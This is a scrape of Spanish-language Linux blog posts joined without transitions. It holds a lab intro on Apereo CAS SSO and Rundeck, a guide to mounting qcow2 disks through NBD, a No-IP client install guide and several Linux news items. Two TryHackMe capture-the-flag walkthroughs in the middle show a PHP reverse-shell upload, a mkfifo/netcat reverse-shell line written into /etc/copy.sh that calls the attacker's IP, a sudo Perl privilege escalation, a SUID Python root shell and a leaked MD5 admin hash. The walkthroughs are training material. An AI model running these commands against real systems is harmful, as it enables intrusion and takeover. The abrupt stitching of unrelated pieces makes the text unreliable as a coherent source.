Así que hoy vamos a ver cómo integrar nuestro SSO de cabecera con esta herramienta a través de un módulo de Apache y de paso vamos a proveerle de un proxy inverso que nos dé encriptación TLS de las comunicaciones.

Listado de episodios

• Parte 1.

Esquema del laboratorio

Como siempre, el primer paso es detallar nuestra arquitectura.

Como plataforma de virtualización se ha utilizado KVM sobre Debian 11 pero se puede hacer con cualquier otra como VirtualBox, VMWare o Hyper-V.

Todos los servidores están desplegados sobre CentOS 7.9 de 64 bits excepto el desktop que es una Debian 11 de 64 bits. En cuanto al resto de componentes:

• El Apache desplegado es el propio del repositorio estándar de CentOS.
• Rundeck Community se ha desplegado en la version 4.7.0.
• 389DS se ha desplegado en la versión 1.3.10.
• Apereo CAS se ha desplegado desde la plantilla de CAS overlay en su versión 6.6.0.

Para el direccionamiento de red se ha usado un segmento de red de clase C en el segmente 192.168.122.0/24 con direccionamiento estático asignado a las máquinas.

La distribución final de los equipos en el laboratorio será la siguiente:

• Servidor 389DS. 2 GB de RAM, 2 vCPU y 40 GB de disco. Dirección IP: 192.168.122.11.
• Servidor Apereo CAS. 2 GB de RAM, 2vCPU y 40 GB de disco. Dirección IP: 192.168.122.12.
• Servidor Rundeck y Apache. 2 GB de RAM, 2vCPU y 40 GB de disco. Dirección IP: 192.168.122.13.
• Estación de trabajo. 2 GB de RAM, 2vCPU y 40 GB de disco. Dirección IP: 192.168.122.2.

Como siempre voy a suponer que sabéis cómo instalar los sistemas operativos, 389DS, Apereo CAS y Rundeck por lo que no voy a explicar esta parte. Al fin y al cabo si estáis leyendo esto entiendo que si estás leyendo este artículo es porque ya sabes todo esto.

Hasta el siguiente episodio.

Activar el modulo NBD

Lo primero es cargar el módulo NBD que nos permitirá conectar el fichero qcow2 como un dispositivo de disco más del sistema.

{% highlight bash %}

igalvit@server:/vms/kvm$ sudo modprobe nbd max_part=8

{% endhighlight %}

Montar el fichero qcow2

Una vez que ya tenemos el módulo cargado tenemos que conectar el fichero qcow2, en mi caso se trata de un disco virtual de una máquina CentOS 7.

{% highlight bash %}

igalvit@server:/vms/kvm$ sudo qemu-nbd –connect=/dev/nbd0 /vms/kvm/centos7.qcow2

{% endhighlight %}

Ver las particiones disponibles

En este punto ya hemos montado el disco pero no sabemos qué contiene, así que vamos a visualizarlo para posteriormente elegir la partición que nos interesa.

{% highlight bash %}

igalvit@server:/vms/kvm$ sudo fdisk /dev/nbd0 -l Disco /dev/nbd0: 20 GiB, 21474836480 bytes, 41943040 sectores Unidades: sectores de 1 * 512 = 512 bytes Tamaño de sector (lógico/físico): 512 bytes / 512 bytes Tamaño de E/S (mínimo/óptimo): 512 bytes / 512 bytes Tipo de etiqueta de disco: dos Identificador del disco: 0x000a1f9c

Dispositivo Inicio Comienzo Final Sectores Tamaño Id Tipo /dev/nbd0p1 * 2048 2099199 2097152 1G 83 Linux /dev/nbd0p2 2099200 41943039 39843840 19G 8e Linux LVM

{% endhighlight %}

Montar la partición

En nuestro caso se trata de un volumen LVM por lo que lleva un poco más de trabajo del habitual.

{% highlight bash %}

igalvit@server:/vms/kvm$ sudo vgscan Found volume group “centos_centos7” using metadata type lvm2 Found volume group “ubuntu_vg” using metadata type lvm2

igalvit@server:/vms/kvm$ sudo vgchange -ay centos_centos7 2 logical volume(s) in volume group “centos_centos7” now active

igalvit@server:/vms/kvm$ sudo lvs LV VG Attr LSize Pool Origin Data% Meta% Move Log Cpy%Sync Convert root centos_centos7 -wi-a—– <17,00g
swap centos_centos7 -wi-a—– 2,00g
root ubuntu_vg -wi-ao—- 921,00g
swap ubuntu_vg -wi-ao—- <9,28g

igalvit@server:/vms/kvm$ sudo mount /dev/centos_centos7/root /mnt -o ro,user

{% endhighlight %}

Visualizar el contenido de un fichero

Como esto es una prueba no vamos a hacer nada complicado, simplemente vamos a visualizar el fichero de la versión de la distribución de CentOS instalada.

{% highlight bash %}

igalvit@server:/vms/kvm$ cd /mnt

igalvit@server:/mnt$ ls bin dev home lib64 mnt proc run srv tmp var boot etc lib media opt root sbin sys usr

igalvit@server:/mnt$ cat etc/redhat-release CentOS Linux release 7.9.2009 (Core)

{% endhighlight %}

Desmontarlo todo

Una vez terminada la tareas ha llegado la hora de recoger velas.

{% highlight bash %}

igalvit@server:/$ sudo umount /mnt

igalvit@server:/$ sudo vgchange -an centos_centos7 0 logical volume(s) in volume group “centos_centos7” now active

igalvit@server:/$ sudo qemu-nbd –disconnect /dev/nbd0 /dev/nbd0 disconnected

{% endhighlight %}

Y con esto damos por finalizado este artículo.

Lazy Admin

El primer paso es hacer un poco de reconocimiento a ver qué nos encontramos.

nmap

root@kali:~# nmap -sS -p- --min-rate 500 --open -n -Pn 10.10.188.99
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-19 16:58 UTC
Nmap scan report for 10.10.188.99
Host is up (0.0071s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:3A:29:AF:90:F3 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 5.18 seconds
root@kali:~# 
root@kali:~# nmap -sV -p22 10.10.188.99
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-19 17:05 UTC
Nmap scan report for ip-10-10-188-99.eu-west-1.compute.internal (10.10.188.99)
Host is up (0.00021s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
MAC Address: 02:3A:29:AF:90:F3 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds
root@kali:~# 

whatweb

root@kali:~# whatweb http://10.10.188.99 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.188.99], Title[Apache2 Ubuntu Default Page: It works]
root@kali:~# 

wfuzz

root@kali:~# wfuzz -c -t 300 --hc=404 -w /usr/share/wordlists/wfuzz/general/big.txt http://10.10.188.99/FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.188.99/FUZZ
Total requests: 3024

===================================================================
ID           Response   Lines    Word     Chars       Payload                                       
===================================================================

000000689:   301        9 L      28 W     314 Ch      "content"                           

Total time: 27.80658
Processed Requests: 3024
Filtered Requests: 3023
Requests/sec.: 108.7512

root@kali:~# 

What is the user flag?

El primer paso es acceder a la web que publica el servidor a ver qué nos encontramos.

En Exploit Database encontramos una vulnerabilidad que nos dice lo siguiente:

[...]
Proof of Concept :

You can access to all mysql backup and download them from this directory.
http://localhost/inc/mysql_backup
[...]

Accedemos a la ruta y nos encontramos un fichero SQL.

Descargamos el fichero y revisándolo nos encontramos la siguiente línea:

\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\"

Parece que tenemos unas credenciales con un hash MD5 para la contraseña pero lo mejor es confirmarlo.

root@kali:~/Downloads# hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: 42f749ade7f9e195bf475f37a44cafcb

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

El siguiente paso será obtener una contraseña de ese hash. La herramienta a utilizar queda al buen entendimiento del lector.

De los datos del wfuzz sabemos que hay una carpeta “/content” y buscando un poco por en el código fuente en GitHub puedes saber que este CMS tiene su web de administración en la carpeta “as”, por lo que la ruta a acceder es “/content/as”

Lo divertido es saber dónde cargar el fichero PHP de la shell inversa. Aquí no queda otra que ir pinchando en las distintas opciones. Yo te ahorro el esfuerzo y te digo que hay que cargarlo desde “Media Center”.

Voy a usar Burp Suite para capturar la llamada POST y poder probar con distintas extensiones de ficheros PHP a ver cuál cuela.

Preparo la sesión de netcat desde el equipo atacante

root@kali:~# netcat -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.34.182] from (UNKNOWN) [10.10.188.99] 47334
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 20:17:53 up  1:21,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$

Ya solo queda ir a por la bandera de usuario.

$ cd /home
$ ls
itguy
$ cd itguy
$ ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backup.pl
examples.desktop
mysql_login.txt
user.txt
$ cat user.txt
{ESTO_NO_TE_LO_PONGO}
$ 

What is the root flag?

El primer paso es intentar escalar privilegios. Vamos a estabilizar la sesión de shell mediante este comando.

python -c 'import pty;pty.spawn("/bin/bash")'

Ahora ya podemos probar a ver si este usuario puede realizar alguna tarea como root mediante sudo.

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

Hay un script de Perl que podemos ejecutar pero que no podemos modificar. Vamos a ver si podemos saber qué hace este script.

$ cat backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");

Ejecuta un fichero llamado “copy.sh” que sí que podemos modificar. Vamos a cambiar su contenido por una shell inversa al equipo atacante.

$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.34.182 5554 >/tmp/f' > /etc/copy.sh
$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.34.182 5554 >/tmp/f

Ejecutamos el script.

$ sudo /usr/bin/perl /home/itguy/backup.pl

Ya solo queda obtener la bandera.

# cd /root
# ls
root.txt
# cat root.txt
{ESTO_NO_TE_LO_PONGO}

Deploy the machine

Bueno esto no tiene mucho misterio, es darle al botón de despliegue y esperar a que arranque.

Reconnaissance

First, let’s get information about the target.

Scan the machine, how many ports are open? What service is running on port 22?

root@kali:~# nmap -sS --min-rate 500 -p- --open -n -Pn 10.10.69.166
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-20 17:10 UTC
Nmap scan report for 10.10.69.166
Host is up (0.0011s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:56:12:EA:16:0D (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 2.97 seconds
root@kali:~# 

What version of Apache is running?

root@kali:~# whatweb 10.10.69.166
http://10.10.69.166 [200 OK] Apache[2.4.29], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.69.166], Script, Title[HackIT - Home]
root@kali:~# 

Find directories on the web server using the GoBuster tool.

Yo uso wfuzz. Lo siento, me resulta más comoda esta herramienta.

root@kali:~# wfuzz -c -t 300 --hc=404 -w /usr/share/wordlists/wfuzz/general/big.txt http://10.10.69.166/FUZZ

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.69.166/FUZZ
Total requests: 3024

===================================================================
ID           Response   Lines    Word     Chars       Payload                             
===================================================================

000000740:   301        9 L      28 W     310 Ch      "css"                               
000001474:   301        9 L      28 W     309 Ch      "js"                               
000001988:   301        9 L      28 W     312 Ch      "panel"                             

Total time: 28.25782
Processed Requests: 3024
Filtered Requests: 3021
Requests/sec.: 107.0146

What is the hidden directory?

Tras revisar los resultados del comando anterior es fácil concluir que la respuesta es /panel/.

Getting a shell

Find a form to upload and get a reverse shell, and find the flag.

He optado por la shell inversa de Pentestmonkey. Hay que editar el fichero y cambiar la IP a la de nuestro equipo atacante y, si se desea, cambiar el puerto.

Al mismo tiempo preparo una sesión de netcat en el equipo atacante para recibir la conexión de la shell inversa.

root@kali:~# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.82.225] from (UNKNOWN) [10.10.69.166] 39068
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:23:36 up 15 min,  0 users,  load average: 0.00, 0.06, 0.14
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

user.txt

$ ls
html
user.txt
$ cat user.txt
{ESTO_NO_TE_LO_PONGO}
$ 

Privilege escalation

Now that we have a shell, let’s escalate our privileges to root.

Search for files with SUID permission, which file is weird?

Hago una búsqueda ejecutables con SUID y entre los resultados destaca el ejecutable de Python.

$ find / -perm -u=s -type f 2>/dev/null
[...]
/usr/bin/python
[...]

Find a form to escalate your privileges.

Busco la forma de explotar el binario de Python en la web GTFOBins y ejecuto lo siguiente.

$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
whoami
root

root.txt

cd /root
ls
root.txt
cat root.txt
{ESTO_NO_TE_LO_PONGO}

Y que equivocación tan agradable, estoy realmente deseoso de probar hasta dónde puede llegar este paso que ha dado Microsoft para llevar su SGBD hasta el sistema operativo del pinguino.


Aunque la máquina tiene instalada Ubuntu 14.04, el proceso que explico a continuación es valido para muchas otras distribuciones.

El primer paso, que ya se que no es recomendable, es elevar tus privilegios a root. Si no quieres hacerlo siempre puedes añadir sudo delante de los comandos que necesiten los privilegios.

sudo -i

Descargamos el paquete con el código fuente desde la propia web deNo-IP y proceder a descomprimirlo:

cd /usr/local/src/
wget http://www.no-ip.com/client/linux/noip-duc-linux.tar.gz
tar xf noip-duc-linux.tar.gz
ls

Accedemos al directorio que hemos descomprimido:

cd noip-2.1.9-1/

Compilamos e instalamos el binario:

make install

Durante el proceso de instalación nos preguntará por los parametros de configuración. Podemos indicar cualquier cosa porque volveremos a reconfigurar el cliente después de que termine de instarlo.

Una vez haya terminado de compilar e instalar el cliente ejecutaremos el siguiente comando para configurar el cliente:

/usr/local/bin/noip2 -C

Y se nos pedirán los siguientes datos:

Please enter the login/email string for no-ip.com xxxxxx
Please enter the password for user 'xxxxxx' ****************
Only one host [xxxxxxxxxx.xxxx.xx is registered to this account.
It will be used.
Please enter an update interval:[30] 
Do you wish to run something at successful update?[N] (y/N) n
New configuration file '/usr/local/etc/no-ip2.conf' created.

El siguiente paso es crear el servicio para que arranque automáticamente en el inicio del sistema operativo:

nano /etc/init.d/noip

Copiamos y pegamos esta configuración dentro del editor nano:

#######################################################
 #! /bin/sh
 case "$1" in
 start)
 echo "Starting noip2"
 /usr/local/bin/noip2
 ;;
 stop)
 echo -n "Shutting down noip2"
 for i in `noip2 -S 2>&1 | grep Process | awk '{print $2}' | tr -d ','`
 do
 noip2 -K $i
 done
 ;;
 *)
 echo "Usage: $0 {start|stop}"
 exit 1
 esac
 exit 0
 #######################################################

Para guardar las modificaciones lo hacemos con Ctrl+X. Ahora cambiamos los permisos del script y probamos su ejecución:

chmod 700 /etc/init.d/noip
sudo /etc/init.d/noip stop
sudo /etc/init.d/noip start

Editamos el fichero del proceso de arranque de Ubuntu:

nano /etc/rc.local

Ponemos en la línea por encima de la línea exit 0 el siguiente comando:

/etc/init.d/noip start

Para guardar las modificaciones lo hacemos con Ctrl+X. Y con este paso se finaliza la instalación. Para comprobar que está funcionando correctamente puedes probar con el comando nslookup para verificar que se actualiza correctamente la entrada DNS en los servidores de No-IP.

nslookup xxxxxxxxxx.xxxx.xx

El nuevo sistema operativo de Microsoft, Windows 10, incluirá un gestor de paquetes al estilo Linux

La cadena británica Currys ha negado la garantía de compra de ordenadores de sobremesa a aquellos clientes que instalaron Linux en sus equipos

Este conflicto empezó hace ya unos meses como un conato abortado sobre todo cuando desde Canonical se decidió acatar la decisión adoptada desde Debian, pero en estos últimos tiempos una coalición de desarrolladores, administradores y usuarios capitaneados por Ian Jackson que propugnan por volver a sysvinit, está tomando fuerza bajo el lema “hacer una cosa y hacerla bien“.

Estaremos atentos a lo que pase a partir de ahora y esperamos que se puede llegar a un consenso beneficioso para todas las partes.

Enlace: http://blog.desdelinux.net/systemd-vs-inteligencia/

Enlace: http://debianfork.org/

Se ha hecho esperar pero finalmente está aquí la versión final de Scientific Linux 7, clon a nivel binario de Red Hat Enterprise Linux 7 (RHEL 7) con una marcada deriva científica, como su nombre adelanta.

Descubre itch.io, todo un templo para los desarrolladores indie con más de 500 juegos totalmente gratuitos para Linux.

Este no es el primer intento de meter la nube en una caja. Ya en mayo,en la Cumbre de OpenStack en Atlanta, Canonical anunció UbuntuOrange Box, una colección de 10 microservidores Intel NUC con uso de memoria compartida y un switch gigabit, todo ello alojado en una sola caja. El producto ha tenido cierto éxito, pero no tanto como el que a Canonical le gustaría.

Esta nueva nube en una solución de caja que es probable que obtenga mucha más atención, lo que es bueno tanto para AMD como para Ubuntu. La solución consiste en un servidor SeaMicro SM15000 y el software de Canonical consiste en:

• 3 Controladoras de nube.
• 57 nodos Nova.
• 3 nodos Cinder.
• 64 TB de almacenamiento.
• 128 GbE NIC (Max. 512).
• Conmutador de capa 2 integrado.
• 80 Gbps de E/S.
• Consume 55 vatios por servidor.
• Ubuntu LTS 14.04 y OpenStack.
• MAAS.
• Juju.

Los clientes obtienen simplicidad al implementar una nube privada. Una de las ventajas de crearla como una unidad de 10U es que encajará rápidamente en el espacio ocupado actualmente por soluciones de servidores blade existentes. Con muchas grandes organizaciones que luchan para desplegar OpenStack en la parte superior de su infraestructura de servidor blade actual, esta simplicidad atraerá.

Otra ventaja es el bajo consumo de energía de la SeaMicro SM15000 en comparación con una solución blade HP o Dell. Esto hará que sea atractivo no sólo para aquellas empresas que buscan una nube privada en las instalaciones, sino también para los proveedores de servicios que buscan soluciones simples de nube privada que pueden ofrecer a los clientes de tamaño medio.

Según Dhiraj Mallick, vicepresidente corporativo y gerente general de soluciones de centro de datos de servidor de AMD:

“AMD y Canonical han dedicado una enorme cantidad derecursos de ingeniería para asegurar una solución integrada queelimina la complejidad de la implementación de la tecnologíaOpenStack. El servidor SM15000, Ubuntu LTS 14.04 yOpenStack es una solución increíble que llena una necesidad en la industria sobre una solución OpenStack que se puede implementar fácilmente sin tener que gastar una fortuna en la contratación de servicios profesionales o equipos de personas.”

Lo más importante en este caso para los clientes es que se trata de una solución totalmente convergente que no requiere grandes cantidades de configuración o de formación. Ha habido un aumento en los dispositivos convergentes, especialmente alrededor del almacenamiento y las bases de datos, por lo que añadir la nube en una caja como una solución convergente tiene sentido.

¿Qué obtendrán AMD y Canonical de todo esto?

Tanto para AMD como para Canonical esto es más que sólo otra oferta de productos en un mercado cada vez más concurrido. AMD ha estado a la defensiva contra Intel en los últimos años y ha decidido que la mejor manera de avanzar es el hiper-escalado, los servidores de bajo consumo y ARM. Se ha introducido un procesador ARM de 64 bits diseñado para el centro de datos en la nube conocida como AMD Opteron 1100 o “Seattle”.

El procesador inicial de esta solución es el procesador AMD Opteron"Piledriver" con la opción de procesadores Intel Xeon “Haswell” y “Ivybridge”. Mirando hacia el futuro, sin embargo, es difícil ignorar el potencial de una opción AMD Opteron “Seattle” en algún momento en el futuro en función de la carga de trabajo y la demanda de los clientes.

Canonical se beneficiará más de AMD. Ubuntu sigue siendo visto como una mala opción frente a Red Hat o SUSE Linux a pesar de acuerdos tanto con Cisco como con IBM. Este último ha estado apoyando fuertemente a Ubuntu con su nueva gama de soluciones POWER 8 y Canonical ha contribuido portando más de 40.000 aplicaciones a IBM POWER.

A pesar de este compromiso por parte de Canonical, IBM ha admitido que todavía tiene que conseguir que Red Hat y SUSE anuncien que sus soluciones little-endian Linux se podrán ejecutar en la plataformade POWER 8 para mejorar su credibilidad. Por desgracia esto no ayuda a la imagen de Canonical y Ubuntu, pero los acuerdos con Cisco y ahora AMD le dará mayor presencia.

Detrás de las escenas, Canonical ha hecho otras ofertas que lo convierten en un jugador más grande de Linux lo que muchos creen. En junio se firmó un acuerdo con Mirantis para asegurar que Ubuntu y Mirantis OpenStack trabajarán perfectamente. Ese acuerdo ha dado lugar a la versión de OpenStack que se distribuye en esta solución.

Además, Canonical ha firmado un acuerdo con Docker para garantizar que su solución de contenedores se ejecuta sin problemas en Ubuntu. Esto también hará que sea más atractivo para los clientes empresariales ya que Docker se está convirtiendo rápidamente en el nuevo estándar de contenedores.

Conclusión

Este parece ser un buen negocio en general. Mientras que algunos clientes pueden no ser conscientes de Ubuntu en el espacio empresarial de Linux, que es más que capaz de mantenerse por si misma contra Red Hat y SUSE. El SM15000 de AMD no es sólo una tecnología probada, sino que es un reemplazo completo del sistema de blades con la potencia suficiente para la más compleja de las tareas. El resultado es que los clientes que han luchado con las implementaciones de nubes privadas pueden ahora acelerar ese proceso con una solución totalmente convergente. Hay otros jugadores que ya están en el mercado con sus propias soluciones convergentes. VMware ha anunciado soluciones con algunos de sus socios de hardware, y HP está tratando de implementar Helion como una nube en una caja para los clientes del sistema blade existentes. ¿Tendrán AMD y Ubuntu éxito en este mercado? Será difícil, pero hay un montón de oportunidades en el mercado para otra solución, especialmente una que esté bien desarrollada e integrada como esta.

Fuente original traducida: https://www.business-cloud.com/articles/news/amd-cloud-box

La ciudad de Udine ha decidido centrarse en Linux y en la migración a software de código abierto que permitirá ahorrar a la ciudad más de 360.000 euros de dinero público.

Son muchos los municipios italianos que están (por fin) considerando seriamente pasarse a Linux y al software libre, que además de permitirles reducir su factura tecnológica, les proporciona sistemas más estables y seguros.

La migración cubrirá aproximadamente 900 ordenadores personales repartidos entre las distintas dependencias municipales y que deberá ser completado durante el año 2015 produciendo el ahorro de más estos 360.000 euros de dinero público según anunció Gabriel Giacomini del Departamento para la Innovación de la ciudad de Udine, que reconoce como el software libre se ha convertido cada vez más completa y fiable y que por tanto la migración no sólo ahorrará dinero, sino que también mantendrá operativo el mismo ordenador personal por varios años más.

La migración irá acompañada también de formación para todo el personal municipal, y estiman que a finales de año más del 40% de los empleados municipales será capaz de trabajar en Linux y software de código abierto.

A fecha de hoy no sabemos la distribución Linux que será elegida para la migración, en cambio si esta clara la elección del paquete ofimática que será usado como alternativa a Microsoft Office, en este caso Apache OpenOffice.

Felicitaciones a la ciudad de Udine por haberse decidido por Linux y el software libre.

Como nota final indicar que no son estas dos las únicas iniciativas que se están desarrollando en Italia. En los últimos meses muchas otras organizaciones gubernamentales locales han dicho adiós a Microsoft cogiendo al software libre en su lugar.Entre ellos se encuentran la provincia autónoma de Tirol del Sur, las provincias de Perugia y Terni y la región de Umbría.

En primer lugar, Linux y el código abierto en la educación se pueden clasificar en tres vertientes:

• La infraestructura de las escuela.
• El escritorio con el que trabajan los alumnos y los profesores.
• El plan de estudios para la educación de TI.

El primer punto, la infraestructura en las escuelas consiste en un montón de diferentes programas informáticos, que se utiliza para la administración. Ejemplos de las aplicaciones como los sistemas de gestión de los estudiantes, los sistemas de gestión de documentos y los sistemas operativos. Básicamente, este software no es tan diferente de lo que se utiliza en otras industrias. Esto se aplica no sólo a la formación profesional, sino a todas las escuelas de cualquier nivel.

El segundo punto, las ordenadores de escritorio que se utilizan en las escuelas están funcionando principalmente en Microsoft Windows®, y gracias a un empujón para conseguir iPads® en las escuelas, sabemos también que pueden educar con la ayuda de otros dispositivos. Así que, ¿por qué no un escritorio Linux?

Por último, en la lista de puntos, he centrado la mayor parte de mi atención, tiempo y energía en el plan de estudios para la educación de TI en educación media y profesional superior en los Países Bajos. Hasta hace cinco años, yo era como una voz en el desierto cuando defendí por Linux y el código abierto en los planes de estudio. A menudo se reían de mí cuando predecía que Linux sería el sistema operativo más utilizado para los servidores. Hoy en día, nadie niega que Linux es un serio competidor en el mundo de los servidores.

Hasta hace muy poco, yo era parte de una comisión para traer un nuevo plan de estudios para una escuela profesional superior para los administradores de sistemas. Más de la mitad de las personas presentes estaban convencidos de que Linux y el código abierto son indispensables para el centro de datos. Y, los administradores de hospedaje Linux y el código abierto son esenciales para que los graduados pudieran conseguir un trabajo en su empresa.

Para este grupo objetivo, es muy importante que el software sea escalable hacia arriba y hacia abajo, tanto técnica como económicamente. Afirman que esto es sólo lo suficientemente flexible con software de código abierto. Si ellos no son flexibles y sus competidores lo son, no pueden sobrevivir.

Un desarrollo más reciente que derribará muchas barreras en las escuelas que quieren enseñar Linux, es la disponibilidad de material de Linux gratuita a través de la Academia Cisco. Desde este ciclo escolar diez millones de estudiantes en todo el mundo tienen acceso gratuito a materiales de enseñanza de nivel de entrada de Linux a través de este método. Se trata de material didáctico basado en el conjunto mundial de objetivos de LPI Linux Essentials.

Este es el siguiente paso en la dirección correcta, pero aún no estamos allí. Por el momento, hay muchos maestros en TI, que no tienen conocimiento o experiencia con Linux y software de código abierto. Así, proveyendo a los profesores de la formación adecuada y la certificación correspondiente es cómo podemos ayudar más.

¿Está su escuela enseñando Linux y software de código abierto?

El tren ha salido de la estación y no va a parar. Depende de las escuelas y de los profesores asegurarse de que salten a bordo. ¿Lo harás tú?

Publicación original: Dutch Linux Magazine, Número 15, Julio/Agosto 2014.

[1] Abreviatura de Tecnologías de la Información.

[2] Traducido del inglés hosting.

Fruto de estas preocupaciones se estableció en marzo de este año un grupo de trabajo en la Academia de Ingeniería de China encabezado por Ni Guangnan para crear un sistema operativo de cosecha propia basado en Linux.

Según esta misma fuente, probablemente durante el próximo mes de octubre estará disponible una versión de escritorio que posteriormente, aunque sin fecha definida, se expandirá a los teléfonos inteligentes y otros dispositivos móviles.

Entre las declaraciones que hizo Ni destacan las siguientes:

[…]”Existen algunos problemas no relacionados con cuestiones técnicas que pueden complicar el desarrollo de este proyecto, entre ellos la falta de fondos para la investigación y que muchos desarrolladores trabajan en diferentes direcciones.”[…]

[…]”China cuenta con más de una docena de desarrolladores de sistemas operativos móviles que no tienen derechos de propiedad intelectual independientes debido a que su investigación se basa en Android“, dijo Ni, añadiendo el desarrollo futuro debe ser dirigido por el propio Gobierno Chino.[…]

[…]”El fin de Windows XP y la prohibición gubernamental sobre la adquisición de Windows 8 han abierto la puerta a los desarrolladores de sistemas operativos domésticos.[…]

[…]”Nuestra clave del éxito está en un entorno que puede ayudarnos a competir con Google, Apple y Microsoft“.[…]

Siempre es bienvenida la iniciativa por parte de un gobierno o institución pública para desarrollar alternativas libres, pero teniendo en cuenta los antecedentes del Gobierno Chino a este respecto, ¿será realmente software libre? ¿Será un caballo de Troya para que el propio Gobierno de China haga lo mismo de lo que se queja? Lo veremos en un futuro próximo.

Fuente: http://www.bbc.com/news/technology-28928369

¿A qué viene el párrafo anterior, pues es sencillo de explicar. Me acaba de llegar a mi cuenta un correo publicitario de esta compañía invitándome a probar su nueva suite Cloud Site para Google Drive que está compuesta por cuatro aplicaciones:

• Drive Box. El cliente de sincronización con Google Drive.
• PrtSc. Capturas de pantalla compartidas a través de un enlace de Google Drive.
• Rolls. Permite compartir una colección de fotos o el escritorio mediante un enlace.
• Warehouse. Permite realizar copias de seguridad directamente a Google Drive.

Curiosamente de las cuatro que lo componen tan solo se puede probar PrtSc y aún sigue en modo beta, lo cual no deja de ser paradójico, ¿invitas a probar un software que todavía no está disponible ni para probarlo? Yo no lo he entendido.

¿Vale la pena pagar por estos servicios? Pues depende, si usas mucho Google Drive como yo, puede que sí, pero sería un detalle poder probarlas antes.

Fuente: https://insync.io/